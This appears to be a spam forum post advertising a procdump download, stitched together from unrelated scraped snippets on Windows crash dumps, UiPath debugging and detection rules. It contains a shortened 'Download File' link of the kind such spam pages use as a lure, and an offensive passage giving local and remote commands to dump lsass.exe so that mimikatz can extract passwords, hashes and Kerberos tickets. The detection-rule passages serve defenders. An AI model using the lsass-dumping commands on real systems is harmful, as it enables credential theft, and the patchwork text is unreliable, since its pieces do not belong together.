How To Download Procdump !NEW!

0 views
Skip to first unread message

Karla Cassone

unread,
Jan 24, 2024, 6:48:51 PM1/24/24
to adfeclyacas

Can somebody clarify if memory dumps produced by WER are the same as those produced by procdump.exe? Can two these tools conflict when used simultaneously? What would be the right approach if my goal is to troubleshoot "service terminated unexpectedly" type of event for a service (on a Server 2012 R2 platform)?

procdump.exe, on the other hand, is a Sysinternals tool (Mark Russinovich, Andrew Richards, et al,) that is designed to be a lot more flexible than WER. If WER was a butter knife, then procdump is a Swiss army knife. For example, procdump.exe can be configured to automatically capture a dump (or series of dumps) when a process stays > 90% CPU usage for 10 seconds, or > 500MB of memory usage, etc. etc. procdump can also be set up as your permanent AeDebug postmortem debugger, which basically makes it a replacement for WER at that point.

how to download procdump


Download Filehttps://t.co/hMkP89i8e6



WER works well enough, (especially when configured to capture full process dumps,) and both WER and procdump capture the same kind of dump, but you only need one or the other. There's not really any sense in trying to use them both.

This will catch a crashing Windows service as well, unless the developer of the service specifically wrote the service to do its own exception handling and avoid being caught by debuggers, which is pretty rare. (And even then, procdump can be configured to dump on first-chance exceptions too.)

PS: You might see the "service terminated unexpectedly" message if the service actually crashed, but you might also see the same message if the service just felt like it needed to exit without cooperating with the Service Manager like it's supposed to. In that case, the developer of the service was just a bad developer, and since there was no actual crash, neither WER nor procdump will help you.

I had an issue with a vendor product, then I had to run procdump to be able to narrow down the possible cause for this issue, now I need to disable it, is there any way to disable it without taking risks because it is on a critical server

Note: To create a dump of a running process, omit the CPU threshold switch. If the name of a dump file is not added, by default .dmp is used. For example, C:\procdump.exe wordpad.exe (this creates a process dump for WordPad in the C root directory).

Hopefully this will be an easy one can anybody advise how I can read the .DMP files that is created from procdump. some of our users have been having outlook issues and I have got procdump to generate the .dmp files I just don't know how to open them thanks

Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. This query does not monitor for the internal name (original_file_name=procdump) of the PE or look for procdump64.exe. Modify the query as needed.
During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been ran, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe.

Detects usage of the SysInternals Procdump utility. This approach can be used to dump the lsass.exe process, which contains the credentials, and then give this dump to mimikatz to extract Windows plaintexts passwords, hashes, PIN code and kerberos tickets from memory. This rule is adapted from _creation/proc_creation_win_sysinternals_procdump.yml

As Procdump is a legitimate Microsoft tool, it's not detected by AntiVirus. The goal is to dump the lsass.exe process, which contains the credentials, and then give this dump to mimikatz.
You need Admin rights to use it. Dump the lsass process which contains credentials:
Local Usage:C:\procdump.exe -accepteula -ma lsass.exe lsass.dmpRemote Usage: (if you do not want to / cannot put the sysinternals tools on disk)net use Z: :\procdump.exe -accepteula -ma lsass.exe lsass.dmp

For creating Dump for .NET Application (UiPath Studio, UiPath Robot Executor) -ma option needs to be enabled since a full dump is necessary.
Regards to capturing a crash dump, -e option needs to be enabled to capture the moment of crash.
A default procdump command would be "procdump -e -ma "

It is important to use the same bitness collector as the target application. UiPath Executor is currently 32 bit, thus 32 bit ProcDump should be used to collect memory dump.

The following table contains possible examples of procdump.exe being misused. While procdump.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

I have always been a fan of Sysinternal and I am very happy that procdump works wonderfully with Windows 8 Store Apps. If you have any questions then feel free to leave them below otherwise see you in the next post! Updated: October 15, 2012

df19127ead
Reply all
Reply to author
Forward
0 new messages